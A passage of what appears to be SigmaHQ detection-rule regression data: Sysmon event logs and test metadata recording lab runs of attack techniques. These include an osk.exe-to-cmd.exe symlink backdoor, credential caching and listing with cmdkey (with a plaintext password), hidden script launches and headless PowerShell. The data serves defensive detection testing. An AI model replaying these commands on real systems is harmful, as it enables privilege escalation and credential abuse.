\"5AA13A44-09CC-68FD-4336-000000004002\",\n      \"ProcessId\": 1060,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\clip.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Clip - copies the data into clipboard\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"clip.exe\",\n      \"CommandLine\": \"clip\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/info.yml",
    "content": "id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ddeff553-5233-4ae9-bbab-d64d2bd634be\n      title: Data Copied To Clipboard Via Clip.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:04:38.507492Z\"\n        }\n      },\n      \"EventRecordID\": 8302863,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:04:38.497\",\n      \"ProcessGuid\": \"5AA13A44-CAE6-68FC-A62F-000000004002\",\n      \"ProcessId\": 7816,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c assoc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml",
    "content": "id: 1a0606d6-3470-45e5-aeea-16098357e709\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061\n      title: Change Default File Association Via Assoc\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:13:54.628884Z\"\n        }\n      },\n      \"EventRecordID\": 8447015,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:13:54.622\",\n      \"ProcessGuid\": \"5AA13A44-CD12-68FC-E62F-000000004002\",\n      \"ProcessId\": 9088,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"dir /s\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml",
    "content": "id: 952d9279-9d38-4dc6-b32e-4b470cf99fc7\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006\n      title: File And SubFolder Enumeration Via Dir Command\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-04T07:01:44.982629Z\"\n        }\n      },\n      \"EventRecordID\": 27923,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3116,\n          \"ThreadID\": 1656\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-04 07:01:44.963\",\n      \"ProcessGuid\": \"0197231E-31D8-6931-7209-000000000900\",\n      \"ProcessId\": 13752,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.26100.2454 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" /c \\\"start /b /min C:\\\\Users\\\\xodih\\\\Music\\\\random.vbs\\\"\",\n      \"CurrentDirectory\": \"C:\\\\WINDOWS\\\\system32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-BBFB-692F-3C8C-050000000000\",\n      \"LogonId\": \"0x58c3c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF\",\n      \"ParentProcessGuid\": \"0197231E-BBFF-692F-8200-000000000900\",\n      \"ParentProcessId\": 5200,\n      \"ParentImage\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"ParentCommandLine\": \"C:\\\\WINDOWS\\\\Explorer.EXE\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml",
    "content": "id: d813db34-f7f0-4713-a419-b491701aa1d1\ndescription: N/A\ndate: 2025-12-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d\n      title: Cmd Launched with Hidden Start Flags to Suspicious Targets\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:15:18.885132Z\"\n        }\n      },\n      \"EventRecordID\": 8471746,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:15:18.879\",\n      \"ProcessGuid\": \"5AA13A44-CD66-68FC-F12F-000000004002\",\n      \"ProcessId\": 8620,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"mklink C:\\\\Windows\\\\System32\\\\osk.exe C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml",
    "content": "id: 20e20ac5-43f2-40a3-811c-53466d1be222\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e9b61244-893f-427c-b287-3e708f321c6b\n      title: Potential Privilege Escalation Using Symlink Between Osk and Cmd\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:16:49.968129Z\"\n        }\n      },\n      \"EventRecordID\": 8498306,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:16:49.961\",\n      \"ProcessGuid\": \"5AA13A44-CDC1-68FC-F82F-000000004002\",\n      \"ProcessId\": 608,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"rmdir /s /q malware_folder\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml",
    "content": "id: 20a05730-38e8-4889-ab29-0723f185deb0\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 41ca393d-538c-408a-ac27-cf1e038be80c\n      title: Directory Removal Via Rmdir\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:20:36.737647Z\"\n        }\n      },\n      \"EventRecordID\": 8565164,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:20:36.729\",\n      \"ProcessGuid\": \"5AA13A44-CEA4-68FC-1330-000000004002\",\n      \"ProcessId\": 4944,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmdkey.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Credential Manager Command Line Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"cmdkey.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmdkey.exe\\\" /generic:TERMSRV/AR-WIN-DC /user:ATTACKRANGE\\\\Administrator /pass:1password2!\",\n      \"CurrentDirectory\": \"C:\\\\tools\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A\",\n      \"ParentProcessGuid\": \"5AA13A44-0BE6-68FC-A61D-000000004002\",\n      \"ParentProcessId\": 10004,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"ParentCommandLine\": \"powershell  -noprofile\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml",
    "content": "id: 56a1d988-b883-41dc-ba91-6077c43189df\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727\n      title: New Generic Credentials Added Via Cmdkey.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:21:33.116889Z\"\n        }\n      },\n      \"EventRecordID\": 8581967,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:21:33.111\",\n      \"ProcessGuid\": \"5AA13A44-CEDD-68FC-1B30-000000004002\",\n      \"ProcessId\": 7876,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmdkey.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Credential Manager Command Line Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"cmdkey.exe\",\n      \"CommandLine\": \"cmdkey  /list\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml",
    "content": "id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53\n      title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:38:32.006926Z\"\n        }\n      },\n      \"EventRecordID\": 12090706,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:38:32.006\",\n      \"ProcessGuid\": \"5AA13A44-0B18-68FD-6336-000000004002\",\n      \"ProcessId\": 7232,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\conhost.exe\",\n      \"FileVersion\": \"10.0.20348.4294 (WinBuild.160101.0800)\",\n      \"Description\": \"Console Window Host\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CONHOST.EXE\",\n      \"CommandLine\": \"conhost  --headless powershell calc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 